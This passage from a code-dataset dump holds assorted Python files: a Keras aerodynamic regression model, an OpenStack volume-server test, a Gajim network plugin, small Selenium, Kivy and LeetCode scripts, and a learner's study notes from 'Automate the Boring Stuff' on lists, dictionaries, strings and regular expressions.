local_file_list)\n","sub_path":"src/modules/download/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"17088900","text":"\n\nimport asyncio\nimport uuid\n\n\nclass ListTargetGen:\n\tdef __init__(self, targets):\n\t\tself.targets = targets\n\n\tasync def run(self, target_q):\n\t\ttry:\n\t\t\tcnt = 0\n\t\t\tfor target in self.targets:\n\t\t\t\tcnt += 1\n\t\t\t\tawait target_q.put((str(uuid.uuid4()),target))\n\t\t\t\tawait asyncio.sleep(0)\n\t\t\treturn cnt, None\n\t\texcept Exception as e:\n\t\t\treturn cnt, e","sub_path":"aiosmb/commons/scanner/targetgen/listtarget.py","file_name":"listtarget.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"614874665","text":"#进度条的滚动\r\n#WebDriver提供execute_script()方法来执行JavaScript代码\r\n#使用方法: window.scrollTo(x,y):\r\n# 方法的第一个参数x表示水平的左间距:方法的第二个参数y表示垂直的上边距。\r\nfrom selenium import webdriver\r\nfrom time import sleep\r\n\r\n#访问百度\r\nd=webdriver.Chrome()\r\nd.get(\"http://www.baidu.com\")\r\n\r\n#设置浏览器窗口大小\r\nd.set_window_size(600,600)\r\n\r\n#搜索\r\nd.find_element_by_id(\"kw\").send_keys(\"邓辉\")\r\n\r\nsleep(2)\r\n\r\n#通过javascript设置浏览器窗口的滚动条位置\r\ndenghui=\"window_scrollTo(100,450);\"\r\nd.execute_script(denghui)\r\nsleep(3)\r\n\r\n\r\nd.quit()\r\n","sub_path":"day00jichu/execute_script.py","file_name":"execute_script.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"59045006","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport csv\r\nfrom tensorflow.keras.layers import *\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.initializers import Constant\r\nfrom tensorflow.keras.initializers import RandomUniform\r\nfrom tensorflow.keras import backend as K\r\nfrom sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.layers import LeakyReLU\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow.keras.metrics import RootMeanSquaredError\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom sklearn.metrics import r2_score\r\n# final model for the moment coefficient\r\n# all the file links must be changed\r\n\r\n# gives a plot for the prediction quality\r\ndef plot_prediction(y_test, y_pred):\r\n a = plt.axes(aspect='equal')\r\n lims = [0, 0.025]\r\n y_test = y_test[:, 0]\r\n y_pred = y_pred[:]\r\n #linear regression through the predicted values and the true values\r\n regr = linear_model.LinearRegression()\r\n y_pred_fit = np.reshape(y_pred, newshape=(-1,1))\r\n y_test_fit = np.reshape(y_test, newshape=(-1,1))\r\n #calculating the r2-score\r\n regr.fit(y_test_fit, y_pred_fit)\r\n #coefficients for the linear regression\r\n r2 = r2_score(y_test_fit, y_pred_fit)\r\n a = regr.intercept_\r\n b = regr.coef_[0]\r\n y_pred_lin = []\r\n for i in lims:\r\n y_pred_lin.append(b*i + a)\r\n #creating the actual plot\r\n plt.xlim(lims)\r\n plt.ylim(lims)\r\n plt.scatter(y_test, y_pred, color = \"lightskyblue\")\r\n plt.xlabel('True Values [MPG]')\r\n plt.ylabel('Predictions [MPG]')\r\n plt.plot(lims, lims, label = \"true_val\", color = \"blue\")\r\n plt.grid(True)\r\n plt.plot(lims, y_pred_lin, label = \"pred_val\", linestyle = \"--\", color = \"orange\")\r\n plt.legend()\r\n plt.show()\r\n print(f\"R2-Value: {r2}\")\r\n\r\n# creates a plot for the loss function -> development of the loss over time\r\ndef plot_loss(history):\r\n plt.plot(history.history['loss'], label='loss')\r\n plt.plot(history.history['val_loss'], label='val_loss')\r\n plt.ylim([0, 0.01])\r\n plt.xlabel('Epoch')\r\n plt.ylabel('Error [MAE]')\r\n plt.legend()\r\n plt.grid(True)\r\n plt.show()\r\n\r\n# loads the dataset\r\ndef getDataset():\r\n # data from the Database:\r\n # Bouhlel, M. A., He, S., and Martins, J. R. R. A., “mSANN Model Benchmarks,” Mendeley Data, 2019. https://doi.org/10.17632/ngpd634smf.1\r\n # all the Subsonic moment coefficient data was put into one csv file\r\n with open('Subsonic/dataKerasCd.csv', 'r') as file:\r\n reader = csv.reader(file, delimiter=\";\")\r\n values = np.array(list(reader), dtype = np.float32)\r\n dim_values = values.shape\r\n x = values[:,:dim_values[1]-1]\r\n y = values[:,-1]\r\n return x, y\r\n\r\n# builds the model\r\ndef build_model(num_features: int, num_targets: int) -> Sequential:\r\n #randomly initilaizes the weight and bias in a predetermined range\r\n init_w = RandomUniform(minval=0.0, maxval=0.1)\r\n init_b = Constant(value=0.0)\r\n\r\n model = Sequential()\r\n model.add(Dense(units=180, kernel_initializer=init_w, bias_initializer=init_b, input_shape = (num_features,)))\r\n model.add(Activation(\"tanh\"))\r\n model.add(Dense(units=160, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(Activation(\"sigmoid\"))\r\n model.add(Dense(units=140, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(Activation(\"selu\"))\r\n model.add(Dense(units=140, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(Activation(\"selu\"))\r\n model.add(Dense(units=140, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(Activation(\"selu\"))\r\n model.add(Dense(units=120, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(LeakyReLU(alpha = 0.3))\r\n model.add(Dense(units=120, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(LeakyReLU(alpha = 0.3))\r\n model.add(Dense(units=120, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.add(LeakyReLU(alpha = 0.3))\r\n model.add(Dense(units=num_targets, kernel_initializer=init_w, bias_initializer=init_b))\r\n model.summary()\r\n\r\n return model\r\n\r\nif __name__ == \"__main__\":\r\n #obtaining of the input and the output from the dataset\r\n x, y = getDataset()\r\n y = np.reshape(y, newshape=(-1,1))\r\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1)\r\n\r\n num_features = x_train.shape[1]\r\n num_targets = y_train.shape[1]\r\n\r\n # building the model\r\n model = build_model(num_features, num_targets)\r\n\r\n #setting the optimizer options\r\n opt = Adam(learning_rate = 0.001)\r\n\r\n # compile the model\r\n model.compile(\r\n loss = \"mae\",\r\n optimizer = opt,\r\n metrics = [RootMeanSquaredError()]\r\n )\r\n\r\n #train the model\r\n history = model.fit(\r\n x = x_train,\r\n y = y_train,\r\n epochs = 500,\r\n batch_size = 256,\r\n verbose = 1,\r\n validation_data = (x_test, y_test)\r\n )\r\n\r\n #evaluate the model\r\n scores = model.evaluate(\r\n x = x_test,\r\n y = y_test,\r\n verbose = 0,\r\n )\r\n\r\n # issue a prediction for the plot of quality of prediction\r\n y_pred = model.predict(x_test).flatten()\r\n plot_prediction(y_test, y_pred)\r\n plot_loss(history)\r\n print(scores)\r\n #save model\r\n model.save(\"C:/Users/Mario/OneDrive/Universität/Semester 8 21 SoSe/PIR/Material/Subsonic/models/cd.h5\")","sub_path":"Scripts/Keras/KerasCd.py","file_name":"KerasCd.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"293545387","text":"\"\"\"\nCopyright 2015 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom cafe.drivers.unittest.decorators import tags\nfrom cloudcafe.common.tools.datagen import rand_name\nfrom cloudcafe.compute.common.types import NovaServerStatusTypes\n\nfrom cloudroast.compute.fixtures import ServerFromVolumeV1Fixture\n\n\nclass CreateVolumeServerfromSnapshotTest(ServerFromVolumeV1Fixture):\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n Perform actions that setup the necessary resources for testing.\n\n The following resources are created during this setup:\n - Creates an active server.\n - Creates an available volume from CBS.\n - Creates an available snapshot.\n - Creates an active image.\n - Creates an available volume from snapshot.\n - Creates an available volume from CBS snapshot.\n \"\"\"\n super(CreateVolumeServerfromSnapshotTest, cls).setUpClass()\n cls.server = cls.server_behaviors.create_active_server().entity\n\n # Creating volume for CBS snapshot scenario\n cls.volume_sec = cls.blockstorage_behavior.create_available_volume(\n size=cls.volume_size, volume_type=cls.volume_type,\n image_ref=cls.image_ref, timeout=cls.volume_create_timeout)\n\n # Creating Snapshot\n cls.snapshot = cls.blockstorage_behavior.create_available_snapshot(\n volume_id=cls.volume_sec.id_)\n\n # Creating glance image from the server\n cls.image = cls.image_behaviors.create_active_image(cls.server.id).entity\n\n # Create Volume from the Image Snapshot\n cls.volume = cls.blockstorage_behavior.create_available_volume(\n size=cls.volume_size, volume_type=cls.volume_type,\n image_ref=cls.image.id, timeout=cls.volume_create_timeout)\n\n # Create Volume from the Snapshot CBS Scenario\n cls.snap_volume = cls.blockstorage_behavior.create_available_volume(\n size=cls.volume_size, volume_type=cls.volume_type,\n snapshot_id=cls.snapshot.id_,\n timeout=cls.volume_create_timeout)\n\n # Clean-up\n cls.resources.add(cls.server.id, cls.servers_client.delete_server)\n cls.resources.add(cls.image.id, cls.images_client.delete_image)\n cls.resources.add(cls.volume.id_,\n cls.blockstorage_client.delete_volume)\n cls.resources.add(cls.volume_sec.id_,\n cls.blockstorage_client.delete_volume)\n cls.resources.add(cls.snap_volume.id_,\n cls.blockstorage_client.delete_volume)\n cls.addClassCleanup(\n cls.blockstorage_behavior.delete_snapshot_confirmed,\n cls.snapshot.id_)\n\n @tags(type='smoke', net='no')\n def test_create_volume_server_from_image_snapshot(self):\n \"\"\"\n Verify the creation of volume server from image snapshot.\n\n Will create a block device mapping and an active server. Then\n verify that the response code is ok and waits for the server to\n become active.\n\n The following assertions occur:\n - 200 status code returned from the crete server call.\n \"\"\"\n # Creating block device with volume from glance snapshot data inside\n self.block_data = self.server_behaviors.create_block_device_mapping_v1(\n volume_id=self.volume.id_,\n device_name=self.images_config.primary_image_default_device,\n size=self.volume_size,\n type='',\n delete_on_termination=True)\n # Creating Instance from Volume V1\n self.server_response = self.server_behaviors.create_active_server(\n block_device_mapping=self.block_data,\n flavor_ref=self.flavors_config.primary_flavor,\n name=rand_name(\"server\"))\n # Verify response code is correct\n self.assertEqual(self.server_response.status_code, 202)\n # Verify the server reaches active status\n wait_response = self.server_behaviors.wait_for_server_status(\n self.server_response.entity.id, NovaServerStatusTypes.ACTIVE)\n self.volume_server = wait_response.entity\n\n @tags(type='smoke', net='no')\n def test_create_volume_server_from_volume_snapshot(self):\n \"\"\"\n Verify the creation of volume server from volume snapshot.\n\n Will create a block device mapping and an active server. Then\n verify that the response code is ok and waits for the server to\n become active.\n\n The following assertions occur:\n - 200 status code returned from the crete server call.\n \"\"\"\n # Creating block device with snapshot data inside\n self.block_data = self.server_behaviors.create_block_device_mapping_v1(\n volume_id=self.snap_volume.id_,\n device_name=self.images_config.primary_image_default_device,\n size=self.volume_size,\n type='snap',\n delete_on_termination=True)\n # Creating Instance from Volume V1\n self.server_response = self.server_behaviors.create_active_server(\n block_device_mapping=self.block_data,\n flavor_ref=self.flavors_config.primary_flavor,\n name=rand_name(\"server\"))\n # Verify response code is correct\n self.assertEqual(self.server_response.status_code, 202)\n # Verify the server reaches active status\n self.server_behaviors.wait_for_server_status(\n self.server_response.entity.id, NovaServerStatusTypes.ACTIVE)\n","sub_path":"cloudroast/compute/integration/volumes/boot_from_volume/v1/images/test_volume_server_from_snapshot.py","file_name":"test_volume_server_from_snapshot.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"327286293","text":"import os\n\nfrom gajim.common import app\nfrom gajim.common import dbus_support\n\nfrom gajim.plugins import GajimPlugin\nfrom gajim.plugins.helpers import log_calls\nfrom gajim.plugins.plugins_i18n import _\n\n\nclass WicdPlugin(GajimPlugin):\n @log_calls('WicdPlugin')\n def init(self):\n self.description = _(\n 'Support for autodetection of network status '\n 'for Wicd Network Manager.\\nRequires wicd and python-dbus.')\n self.config_dialog = None\n self.test_activatable()\n\n def test_activatable(self):\n self.available_text = ''\n if os.name == 'nt':\n self.available_text = _('Plugin can\\'t be run under Windows.')\n self.activatable = False\n return\n if not dbus_support.supported:\n self.activatable = False\n self.available_text += _('python-dbus is missing! '\n 'Install python-dbus.')\n\n @log_calls('WicdPlugin')\n def activate(self):\n try:\n import dbus\n from gajim.common.dbus_support import system_bus\n\n self.bus = system_bus.bus()\n\n if 'org.wicd.daemon' not in self.bus.list_names():\n return\n wicd_object = self.bus.get_object('org.wicd.daemon',\n '/org/wicd/daemon')\n self.props = dbus.Interface(wicd_object,\n 'org.freedesktop.DBus.Properties')\n self.bus.add_signal_receiver(self.state_changed,\n 'StatusChanged',\n 'org.wicd.daemon',\n 'org.wicd.daemon',\n '/org/wicd/daemon')\n except dbus.DBusException:\n pass\n\n @log_calls('WicdPlugin')\n def deactivate(self):\n self.bus.remove_signal_receiver(self.state_changed,\n 'StatusChanged',\n 'org.wicd.daemon',\n 'org.wicd.daemon',\n '/org/wicd/daemon')\n\n def state_changed(self, state, _info):\n # Connection state constants\n # NOT_CONNECTED = 0\n # CONNECTING = 1\n # WIRELESS = 2\n # WIRED = 3\n # SUSPENDED = 4\n if state in (2, 3):\n for connection in app.connections.values():\n if app.config.get_per('accounts', connection.name,\n 'listen_to_network_manager') and connection.time_to_reconnect:\n connection._reconnect()\n else:\n for connection in app.connections.values():\n if app.config.get_per('accounts', connection.name,\n 'listen_to_network_manager') and connection.connected > 1:\n connection._disconnectedReconnCB()\n","sub_path":"wicd_support/wicd_support.py","file_name":"wicd_support.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"331109129","text":"from kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.graphics import Line, Color\r\nfrom kivy.clock import Clock\r\nimport colorsys\r\nimport time\r\n\r\n\r\nclass Main(BoxLayout):\r\n\r\n count = 0\r\n\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n Clock.schedule_interval(self.execute, 1 / 30)\r\n\r\n def execute(self, dt):\r\n start = time.time()\r\n width = self.panel.size[0]\r\n points = [0] * 200000\r\n for i in range(0, 200000, 2):\r\n points[i] = i % width\r\n points[i + 1] = i / 10\r\n self.panel.canvas.clear()\r\n self.count += 1\r\n r, g, b = colorsys.hsv_to_rgb(self.count / 256, 1.0, 1.0)\r\n with self.panel.canvas:\r\n Color(r, g, b, 1.0)\r\n Line(points=points, width=1)\r\n self.time = time.time() - start\r\n\r\n def export(self):\r\n self.panel.export_to_png('test.png')\r\n\r\n\r\nclass TestApp(App):\r\n\r\n def build(self):\r\n return Main()\r\n\r\n\r\nif __name__ == '__main__':\r\n from kivy.config import Config\r\n Config.set('graphics', 'fullscreen', 'auto')\r\n TestApp().run()\r\n","sub_path":"python/canvas/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"131200662","text":"class Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n min_price = prices[0]\n profit = 0\n\n for price in prices:\n min_price = min(min_price, price)\n profit = max(profit, price - min_price)\n\n return profit\n\ns=Solution()\nprint(s.maxProfit(prices = [7,1,5,3,6,4]))\n","sub_path":"python/121_best_time_to_buy_and_sell_stocks.py","file_name":"121_best_time_to_buy_and_sell_stocks.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"550549414","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 29 14:12:56 2020\n\n@author: Matthew\n\"\"\"\n\n#Continuing Automate The Boring Stuff\n#Chapter 4 - Lists\nspam = ['cat', 'bat', 'duck']\nspam[1]\nspam[0]\n#lists in lists\nspam2 = [['cat', 'bat', 'duck'], [1, 2, 3, 4]]\nspam2[1][2]\n#negative indices start from the last\nspam2[0][-1]\n#slices of lists\nspam2[0][0:2]\n# 'up to but not including the last number' - ex. not 'duck'\nlen(spam2[0])\n#Assigning\nspam2[0][1] = 'potato'\n#can overwrite entire list if syntax is off\nspam2[0] = 'gone'\nprint(spam2)\n#deletions\ndel spam2[1][2]\n#Ex program\ncatNames = []\nwhile True:\n print('Enter the name of cat' + str(len(catNames)+1)+\n ' (Or enter nothing to stop.):')\n name = input()\n if name =='':\n break\n catNames = catNames + [name] #list concatenation\nprint('The cat names are:')\nfor name in catNames:\n print(' '+ name)\n# loops and lists\nsupplies = ['pens', 'staplers', 'flame-throwers', 'binders']\nfor i in range(len(supplies)):\n print('Index' + str(i) + 'in supplies is : ' + supplies[i])\n#in and not in\nprint(spam2)\n'cat' in spam2[0] #True\n'dog' in spam2[0] #False\n#example program\nmyPets = ['Zophie', 'Pooka', 'Fat-tail']\nprint('Enter a pet name:')\nname = input()\nif name not in myPets:\n print('I do not have a pet named ' + name)\nelse:\n print(name + ' is my pet.')\n#Multiple assignment trick - thb dont understand this one.\ncat = ['fat', 'black', 'loud']\nsize, color, disposition = cat\n#Methods - similar to function but it will be 'called on' a value.\nspam = ['hello', 'hi', 'howdy', 'heyas']\nspam.index('heyas')\n#if duplicates, displays the first position in a list\nspam = ['hello', 'hi', 'hello', 'howdy', 'heyas']\nspam.index('hello')\n# .append() - on the end\nspam.append('potato')\n#insert(#position, list)\nspam.insert(2, 'oregano')\n#both insert and append are only applicable on lists []\nspam.remove('hello')\n#also just removes the 1st instance of a value\n# del() if you know the position you want to remove, remove() if you know the value\n#sort() integers and flaots low to high, strings alphabetical \nspam.sort()\nspam\n#alternatively\nspam.sort(reverse=True)\nspam\n#is case sensitive, all caps will be sorted, followed by all lowercase\n#simplified 8 ball program\nimport random\nmessages = ['It is certain',\n 'It is decidedly so',\n 'Yes definitely',\n 'Reply hazy try again',\n 'Ask again later',\n 'Concentrate and ask again',\n 'My reply is no',\n 'Outlook not so good',\n 'Very doubtful']\nprint(messages[random.randint(0, len(messages) - 1)])\n#strings are essentially lists at the end of the day, ex: \nname = 'Zophia'\nname[1]\nfor i in name:\n print('***'+ i +'***')\n\n#testing the updating of things on github across both computers\n#tuples are lists that are immutable - cant be modified - like strings\n#Used with round brackets ()\neggs = ('hello', 42, 0.4)\n#trailing comma indicates a tuple instead of a regular value\nfish = (2,) #tuple\nfish = (2) #integer value, equivalent to fish = 2 \n#ordered sequence that dont change - use a tuple\n#tuples and lists can be converted between each other\nfish = (2,3,4,5)\nfish2 = list((2,3,4,5))\nfish2\n#assigning a variable to a list is a reference to the list,\n#not the actual list itself, EX:\nspam = [1,2,3,4,5]\ncheese = spam\ncheese[1] = 'hello'\nspam\n# they both refer to the same list, not the case with tuples\n#the variable assigned to a tuple IS the tuple\n#Passing reference:\ndef eggs(someParameter):\n someParameter.append('Hello')\nspam = [1,3,4]\neggs(spam)\nprint(spam)\n#making true copys:\nimport copy\nspam = ['A','B','C','D']\ncheese = copy.copy(spam)\ncheese[2] = 43\nspam\ncheese\n#2 different lists like you would expect with other data types\n#copy.deepcopy() will do the same with lists that contain internal lists\n\n#practice problems ch4\n\ndef stringy(string):\n st = ''\n for i in range(len(string)):\n if i > 0:\n if i == len(string) -1:\n st = st + ' and '\n else:\n st = st + ', '\n st = st + string[i];\n return st\nspam = ['apples', 'bananas', 'tofu', 'cats']\nstringy(spam)\n#problem 2\ngrid = [['.', '.', '.', '.', '.', '.'],\n ['.', 'O', 'O', '.', '.', '.'],\n ['O', 'O', 'O', 'O', '.', '.'],\n ['O', 'O', 'O', 'O', 'O', '.'],\n ['.', 'O', 'O', 'O', 'O', 'O'],\n ['O', 'O', 'O', 'O', 'O', '.'],\n ['O', 'O', 'O', 'O', '.', '.'],\n ['.', 'O', 'O', '.', '.', '.'],\n ['.', '.', '.', '.', '.', '.']]\n\ndef layer(row):\n for j in range(len(row[0])):\n for i in range(len(row)):\n print(row[i][j], end = '')\n print('')\nlayer(grid)\n#end ch4\n\n#start chapter 5 - Dictionaries and Structuring Data\n#Dictionaries - indexed with keys > key-value pairs\nmyCat = {'size': 'fat', 'colour': 'grey', 'disposition': 'loud'}\n#size, colour, disposition are the keys, all associated with their values\nmyCat['size']\n'My cat has ' + myCat['colour'] + ' fur.'\n#can use integers as keys as well. Can be any number\nspam = {12345: 'Luggage Combination', 42: 'The Answer'}\n#dictionaries are not ordered like lists or tuples\n#therefore cant be sliced\nbirthdays = {'Alice': 'Apr 1', 'Bob': 'Dec 12', 'Carol': 'Mar 4'}\nwhile True:\n print('Enter a name: (Blank to quit)')\n name = input()\n if name == '':\n break\n if name in birthdays:\n print(birthdays[name] + ' is the birthday of ' +name)\n else:\n print('I do not have birthday information for ' + name)\n print('What is their birthday?')\n bday = input()\n birthdays[name] = bday\n print('Birthday database updated')\n#this data does not get saved permanently in the dictionary - will be taught later in the book\n#keys(), values(), items()\nspam = {'colour': 'red', 'age': 42}\nfor v in spam.values():\n print(v)\nfor k in spam.items():\n print(k)\n#more multiple assignment things\nfor k, v in spam.items():\n print('Key: '+ k + ' Value: ' + str(v))\n#can still use in and not in to check for stuff in the dictionary\nspam = {'name': 'Zophie', 'age': 7}\n'name' in spam.keys()\n'color' not in spam.keys()\n'Zophie' in spam.values()\n#get()\npicnicItems = {'apples': 5, 'cups': 2} \n#inserting a default fallback value if the key is missing (0 in this case)\n'I am bringing ' + str(picnicItems.get('cups', 0)) + ' cups.'\n'I am bringing ' + str(picnicItems.get('eggs', 0)) + ' eggs.'\n#setdefault() - only if that key doesnt have a value\nspam = {'name': 'Pooka', 'Age': 5}\nif 'colour' not in spam:\n spam['colour'] = 'black'\n#setdefault condenses this down to 1 line\nspam = {'name': 'Pooka', 'Age': 5}\nspam.setdefault('colour', 'black')\nspam\n#setdefault ensures that a key exists\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\nfor character in message:\n count.setdefault(character, 0)\n count[character] = count[character] + 1\nprint(count)\n#Pretty Print with pprint() and pformat()\nimport pprint\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\nfor character in message:\n count.setdefault(character, 0)\n count[character] = count[character] + 1\npprint.pprint(count)\n#sorts keys, adds newlines, way cleaner\n#pprint.pformat() makes it into a string\nprint(pprint.pformat(count))\n#modeling tic tac toe with a dictionary\ntheBoard = {'top-L': ' ', 'top-M': ' ', 'top-R': ' ',\n 'mid-L': ' ', 'mid-M': ' ', 'mid-R': ' ',\n 'low-L': ' ', 'low-M': ' ', 'low-R': ' '}\ndef printBoard(board):\n print(board['top-L'] + '|' + board['top-M'] + '|' + board['top-R'])\n print('-+-+-')\n print(board['mid-L'] + '|' + board['mid-M'] + '|' + board['mid-R'])\n print('-+-+-')\n print(board['low-L'] + '|' + board['low-M'] + '|' + board['low-R'])\nprintBoard(theBoard)\nturn = 'X'\nfor i in range(9):\n printBoard(theBoard)\n print('Turn for ' + turn + '. Move on which space?')\n move = input()\n theBoard[move] = turn\n if turn == 'X':\n turn = 'O'\n else:\n turn = 'X'\nprintBoard(theBoard)\n#simple dictionary pairings between single places and a state\n#can do nested dictionaries for more complicated situations\nallGuests = {'Alice': {'apples': 5, 'Pretzels':12},\n 'Bob': {'ham sandwiches': 3, 'apples': 2},\n 'Carol': {'cups': 3, 'apple pies': 1}}\ndef totalBrought(guests, item):\n numBrought = 0\n for k, v in guests.items():\n numBrought = numBrought + v.get(item, 0)\n return numBrought\n\nprint('Number of things being brought:')\nprint(' - Apples ' + str(totalBrought(allGuests, 'apples')))\nprint(' - Cups ' + str(totalBrought(allGuests, 'cups')))\nprint(' - Cakes ' + str(totalBrought(allGuests, 'cakes')))\nprint(' - Ham Sandwiches ' + str(totalBrought(allGuests, 'ham sandwiches')))\nprint(' - Apple Pies ' + str(totalBrought(allGuests, 'apple pies')))\n#dumb for this purpose, but can be extended to thousands of entries\n#end chapter 5, didnt do the practice problems, so much typing, little thinking\n\n#Chapter 6 - Manipulating Strings\n#manipulating strings\nspam = 'Say hi to Bob\\'s mother' \n#escape character \\ to allow the ' without ending the string\n# Escape character Prints as\n# \\' Single quote\n# \\\" Double quote\n# \\t Tab\n# \\n Newline (line break)\n# \\\\ Backslash\nprint(\"Hello there! \\nHow are you?\\nI\\'m doing fine.\")\n#raw strings (r...) completely ignore all escape characters\nprint(r'That is Carol\\'s cat.')\n#triple quotes for multiline strings\nprint('''Dear Alice,\n \nEve's cat has been arrested for catnapping, cat burglary, and extortion.\n\nSincerely,\nBob''')\n# includes the newlines as part of the string, alt:\nprint('Dear Alice,\\n\\nEve\\'s cat has been arrested for catnapping, cat burglary, and extortion.\\n\\nSincerely,\\nBob')\n#useful string methods\nspam = 'Hello world!'\nspam = spam.upper()\nspam\nspam = spam.lower()\nspam\n#these call new strings, not directly modifying the original\nprint('How are you?')\nfeeling = input()\nif feeling.lower() == 'great':\n print('I feel great too!')\nelse:\n print('I hope the rest of your day is good.')\n#putting input into lowercase allows you to accomodate case insensitivity\n#isupper() and islower() allow you to test what a string is.\n#will return a True/False value\n#other isX() calls:\n#isalpha() # is the string only letters?\n#isalnum() # is the string only letters and numbers?\n#isdecimal() # is the string only numbers?\nwhile True:\n print('Enter your age:')\n age = input()\n if age.isdecimal():\n break\n print('Please enter a number for your age.')\nwhile True:\n print('Select a new password (letters and numbers only):')\n password = input()\n if password.isalnum():\n break\n print('Passwords can only have letters and numbers.')\n#startswith() and endswith() - self explanatory methods\n# .join() and .split() switch strings and lists, ex:\n'My name is Simon'.split()\n' '.join(['My', 'name', 'is', 'Simon'])\n'ABC'.join(['My', 'name', 'is', 'Simon'])\n'MyABCnameABCisABCSimon'.split('ABC')\n#Justifying text with - rjust(), ljust(), center()\n'Hello'.rjust(10)\n'Hello'.rjust(20)\n'Hello World'.rjust(20,'*')\n'Hello'.ljust(10, 'p')\n#use things like this to make pretty outputs of data\ndef printPicnic(itemsDict, leftWidth, rightWidth):\n print('PICNIC ITEMS'.center(leftWidth + rightWidth, '-'))\n for k, v in itemsDict.items():\n print(k.ljust(leftWidth, '.') + str(v).rjust(rightWidth))\npicnicItems = {'sandwiches': 4, 'apples': 12, 'cups': 4, 'cookies': 8000}\nprintPicnic(picnicItems, 12, 5)\nprintPicnic(picnicItems, 20, 6)\n#Removing Whitespace with strip(), rstrip(), and lstrip()\n\n#Table Printer Practice Project\n\ntableData = [['apples', 'oranges', 'cherries', 'banana'],\n['Alice', 'Bob', 'Carol', 'David'],\n['dogs', 'cats', 'moose', 'goose']]\n\ndef printTable(doggo):\n colL = [0] * len(doggo) \n for j in range(len(doggo)):\n for i in range(len(doggo[j])):\n if len(doggo[j][i]) > colL[j]:\n colL[i] = len(doggo[j][i])\n for y in range(len(doggo[0])):\n for x in range(len(doggo)):\n print(doggo[x][y].rjust(colL[x]), end = '')\n print('')\n\nprintTable(tableData)\n#good enough\n\n#Part 2 of the book: Automating Tasks\n\n#Chapter 7\n#Pattern matching with regular expressions\n# used for searching for things that are in a consistent format,\n#like phone numbers, emails, etc. \n#///\n#Finding patterns without regular expressions\ndef isPhoneNumber(text):\n if len(text) !=12:\n return False\n for i in range(0, 3):\n if not text[i].isdecimal():\n return False\n if text[3] != '-':\n return False\n for i in range(4, 7):\n if not text[i].isdecimal():\n return False\n if text[7] != '-':\n return False\n for i in range(8, 12):\n if not text[i].isdecimal():\n return False\n return True\nprint(isPhoneNumber('495-635-5453')) \nprint(isPhoneNumber('moshi moshi'))\n#test\nmessage = 'Call me at 415-555-1011 tomorrow. 415-555-9999 is my office.'\nfor i in range(len(message)):\n chunk = message[i:i+12]\n if isPhoneNumber(chunk):\n print('Phone number found: ' + chunk)\nprint('Done')\n#now with regular expressions\nimport re\nphoneNumRegex = re.compile(r'\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d') # remember '(r' makes it a raw string\n#regular expressions frequently use \\ so passing raw strings save \\\\ each time\n#.search() looks in a string it is passed for the regex patters\nmo = phoneNumRegex.search('My number is 415-555-4242.')\nprint('Phone number found: ' + mo.group())\nphoneNumRegex = re.compile(r'(\\d\\d\\d)-(\\d\\d\\d-\\d\\d\\d\\d)')\nmo = phoneNumRegex.search('My number is 415-555-4242')\nmo.group(1)\nmo.group(2)\nmo.group(0)\nmo.group()\nmo.groups()\nareaCode, mainNumber = mo.groups()\nprint(areaCode)\nprint(mainNumber)\n#if area code in ()\nphoneNumRegex = re.compile(r'(\\(\\d\\d\\d\\)) (\\d\\d\\d-\\d\\d\\d\\d)')\nmo = phoneNumRegex.search('My number is (415) 555-4242')\nmo.group(1)\n#matching multiple groups with the pipe |, essentially 'this' or 'this'\nheroRegex = re.compile(r'Batman|Tina Fey')\nmo1 = heroRegex.search('Batman and Tina Fey')\nmo1.group()\n#if a string has both, will always be the first of the 2 incidents\n#specifying a prefix\nbatRegex = re.compile(r'Bat(man|mobile|copter|bat)')\nmo = batRegex.search('Batmobile lost a wheel')\nmo.group()\n#optional matching with a ?\nbatRegex = re.compile(r'Bat(wo)?man')\nmo1 = batRegex.search('The Adventures of 